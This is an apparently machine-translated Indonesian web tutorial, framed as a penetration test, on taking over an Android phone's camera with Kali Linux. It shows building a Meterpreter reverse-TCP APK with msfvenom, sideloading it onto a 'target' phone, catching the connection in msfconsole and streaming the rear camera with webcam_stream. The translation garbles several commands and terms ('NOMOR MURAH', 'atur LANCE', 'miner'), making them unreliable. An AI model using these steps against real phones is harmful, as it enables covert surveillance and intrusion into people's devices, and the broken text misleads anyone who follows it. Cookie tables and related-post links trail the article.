Cara Menjalankan Penetration Test Kamera HP Android dengan Kali Linux

0 3 minutes read

Catatan: Dalam topik berikutnya yang akan Anda baca, Anda akan mempelajari tentang: Cara Menjalankan Penetration Test Kamera HP Android dengan Kali Linux

Ada beberapa berita tentang peretas yang membajak kamera Android untuk mendengarkan penggunanya atau memberi mereka gambar palsu. Sebagai pemilik ponsel yang waspada, Anda dapat mencegah hal ini dengan menilai kemungkinan dan risiko nyata dari kejadian yang mengancam tersebut.

Kali Linux adalah salah satu alat terbaik untuk menguji potensi kerentanan kamera Android Anda melalui pengujian penetrasi. Itu dapat membuat Anda tetap di atas semua upaya peretasan untuk mendapatkan akses jarak jauh ke kamera ponsel Anda.

Pengaturan beban

Untuk menggunakan Kali Linux untuk uji penetrasi, unduh terlebih dahulu dari situs resminya. Lihat tutorial sebelumnya untuk definisi berbagai istilah, misalnya “msfvenom”, “msfconsole”, “métpreter” dan lainnya yang akan digunakan dalam latihan ini.

Langkah pertama dalam pengujian penetrasi adalah memasang muatan standar pada perangkat. Untuk melakukan ini, buka terminal Kali Linux dan masukkan perintah berikut: ifconfig. Ini akan memberi Anda alamat IP dari sesi Kali Linux Anda.

Sekarang masukkan perintah yang ditunjukkan di bawah ini dengan alamat IP di atas. Nomor port eksploitasi, Trojan, dan kerentanan lainnya umumnya tercantum sebagai 4444.

msfvenom – p android/Meterpreter/Reverse_tcp L HOST = alamat IP LPORT = NOMOR MURAH > Payload.apk

Pada langkah ini, Anda mencoba memasukkan muatan metasploit, berdasarkan juru bahasa Java. Jika berhasil, pengujian penetrasi akan membantu Anda memverifikasi apakah ponsel Anda rentan terhadap seseorang yang mendengarkan panggilan telepon, akses SMS, geolokasi pengguna, dll.

Dalam hal ini, upayanya adalah untuk menunjukkan bagaimana eksploit dapat digunakan untuk mendapatkan akses ke kamera ponsel.

Setelah penambangan dimulai, file APK bernama “Payload” akan diinstal di direktori root. Anda perlu menginstalnya di ponsel Android target. Tapi lebih mudah diucapkan daripada dilakukan. Sebagian besar ponsel dan email Android yang lebih baru menolak untuk membawa file yang terinfeksi malware tersebut, dan itu tidak masalah.

Tapi itu masih bisa dicapai melalui kabel USB atau file sementara. Jika seorang peretas mendapat akses ke ponsel Anda selama beberapa menit, itu membuatnya agak rentan. Tugas kita di sini dalam uji penetrasi ini adalah menentukan tingkat risiko yang tepat.

Kamera Android muatan Kali Linux dipasang di root

Setelah transfer, Anda harus menemukan cara untuk menginstal file payload di ponsel Anda. Jika itu bukan versi Android yang sangat lama, ponsel Anda akan memberi Anda beberapa peringatan sebelum APK dapat diinstal. Terlepas dari versi ponsel Android, ada cara lain untuk memasang aplikasi dari sumber yang tidak dikenal di ponsel Android.

Peluncuran Penambangan

Untuk mulai menggunakan payload di atas, masukkan perintah berikut: msfconsole. Hanya perlu beberapa detik untuk menjalankan perintah dan metasploit dapat dibaca untuk pengujian penetrasi lebih lanjut pada kamera ponsel.

Metasploit akan memberikan deskripsi lengkapnya sendiri. Komposisi payload juga terlihat. Ini menunjukkan jumlah eksploitasi di tempat kerja.

Meluncurkan Kamera Android Kali Linux Msfconsole

Langkah selanjutnya, msfconsole siap untuk memulai penambangan. Untuk ini, lihat alamat IP dan nomor port (4444) yang telah dibahas sebelumnya. Dengan demikian, masukkan perintah berikut:

exploit (multi/prosesor) > atur LHOST “IP Address” (ENTER) atur LANCE “Port Number” (ENTER) miner (ENTER)

Kamera Android Kali Linux Msf5 Diluncurkan

Ketika Reverse TCP Manager diaktifkan, Anda akan melihat langkah-langkah berbeda di Start Clock Interpreter. Tunggu beberapa detik saat mendiagnosis ponsel target.

Perlu disebutkan di sini bahwa sebagian besar ponsel Android modern terus menolak akses ini. Ingat, ini adalah tes penetrasi. Jika ponsel Android Anda tidak dapat diretas dengan file APK yang mematikan ini, berarti pabrikan ponsel Anda mengetahui vektor serangan ini.

Akses ke kamera ponsel Android

Jika Anda berhasil memasukkan eksploit ke dalam telepon, ada kemungkinan sekarang dapat disusupi. Ketika ini terjadi, “meteran” di terminal Kali Linux dapat membuat koneksi dengan telepon. Saat ini, implementasi bantuan untuk mengakses banyak opsi di ponsel Android sedang diserang.

Masukkan perintah berikut (dari menu bantuan) untuk mengakses kamera di ponsel Anda. Dalam penggunaan ini, upaya dilakukan untuk mengakses kamera belakang untuk mengambil gambar dari terminal.

webcam_list (ENTER) 1. Kamera belakang 2. Kamera depan (ENTER) webcam_stream -i 1

Untuk melakukan tes penetrasi yang sukses, ambil gambar dan simpan di direktori root Kali Linux setelah mengakses kamera. Anda juga dapat mengedit, mengganti nama, atau menghapus gambar tersimpan lainnya. Oleh karena itu, setiap penetrasi yang berhasil pada ponsel yang diuji merupakan panggilan untuk kemungkinan serangan nyata, yang berarti sudah waktunya untuk pembaruan keamanan.

Snapshot Kamera Kamera Android Kali Linux

Dalam tutorial ini Anda akan belajar bagaimana kamera Android dapat diakses dari terminal Kali Linux untuk pengujian penetrasi.

Ini adalah artikel penelitian keselamatan. Jika Anda membuka kamera orang lain untuk demonstrasi, Anda harus selalu meminta izin terlebih dahulu, jika tentu saja itu bukan ponsel Anda sendiri. Jangan lupa untuk memeriksa aplikasi peretasan Android ini sehingga Anda dapat menguji dan menemukan kerentanan di ponsel Anda

Lanjut membaca:

Apakah artikel ini berguna?

Name	Domain	Purpose	Expiry	Type
wpl_user_preference	apsachieveonline.org	WP GDPR Cookie Consent Preferences	1 year	HTTP
YSC	youtube.com	YouTube session cookie.	Session	HTTP
AWSALB	api.intentiq.com	Amazon Web Services Load Balancer cookie.	7 days	HTTP

Name	Domain	Purpose	Expiry	Type
VISITOR_INFO1_LIVE	youtube.com	YouTube cookie.	Session	HTTP
GPS	youtube.com	Google advertising domain	Session	HTTP

Name	Domain	Purpose	Expiry	Type
uid	tynt.com	Generic AddThis tracking cookie.	1 year	HTTP
bkdc	bluekai.com	BlueKai tracking cookie.	Session	HTTP
bku	bluekai.com	BlueKai tracking cookie.	Session	HTTP
IDE	doubleclick.net	Google advertising cookie used for user tracking and ad targeting purposes.	1 day	HTTP
_cc_dc	crwdcntrl.net	Lotame tracking cookie.	6 months	HTTP
_cc_id	crwdcntrl.net	Lotame tracking cookie.	6 months	HTTP
_cc_cc	crwdcntrl.net	Lotame tracking cookie.	6 months	HTTP
_cc_aud	crwdcntrl.net	Lotame tracking cookie.	6 months	HTTP
vuid	vimeo.com	Vimeo tracking cookie	2 years	HTTP

Name	Domain	Purpose	Expiry	Type
CountUid	histats.com	---	1 year	---
HstCfa4342789	apsachieveonline.org	---	1 year	---
HstCmu4342789	apsachieveonline.org	---	1 year	---
HstCnv4342789	apsachieveonline.org	---	1 year	---
HstCns4342789	apsachieveonline.org	---	1 year	---
m	dtscout.com	---	Session	---
df	dtscout.com	---	3 months	---
l	dtscout.com	---	3 months	---
__stid	sharethis.com	---	1 year	---
__dtsu	apsachieveonline.org	---	3 months	---
33x_ps	33across.com	---	1 year	---
__cfduid	apsachieveonline.org	Generic CloudFlare functional cookie.	1 year	HTTP
HstCla4342789	apsachieveonline.org	---	1 year	---
HstPn4342789	apsachieveonline.org	---	1 year	---
HstPt4342789	apsachieveonline.org	---	1 year	---
b	dtscout.com	---	Session	---
st	dtscout.com	---	Session	---
pxcelPage_c010_C	t.sharethis.com	---	14 days	---
pids	tynt.com	---	3 months	---
pxcelBcnLcy	t.sharethis.com	---	51 years	---
ab	agkn.com	---	1 year	---
IQver	intentiq.com	---	2 years	---
intentIQ	intentiq.com	---	2 years	---
intentIQCDate	intentiq.com	---	2 years	---
AWSALBCORS	api.intentiq.com	---	7 days	---
bkpa	bluekai.com	---	6 months	---

Pengaturan beban

Peluncuran Penambangan

Akses ke kamera ponsel Android

Pos terkait

Gambar komponen Google Pixel 5a Surface Online; Dijadwalkan untuk diluncurkan pada 17 Agustus

Cara mendapatkan lebih banyak bisnis online dan meningkatkan laba Anda

Google membatalkan ‘Wawasan Jaringan Seluler’ untuk melindungi data pengguna

Unduh permainan "Deus Ex: Musim Gugur" untuk iPhone dan iPad GRATIS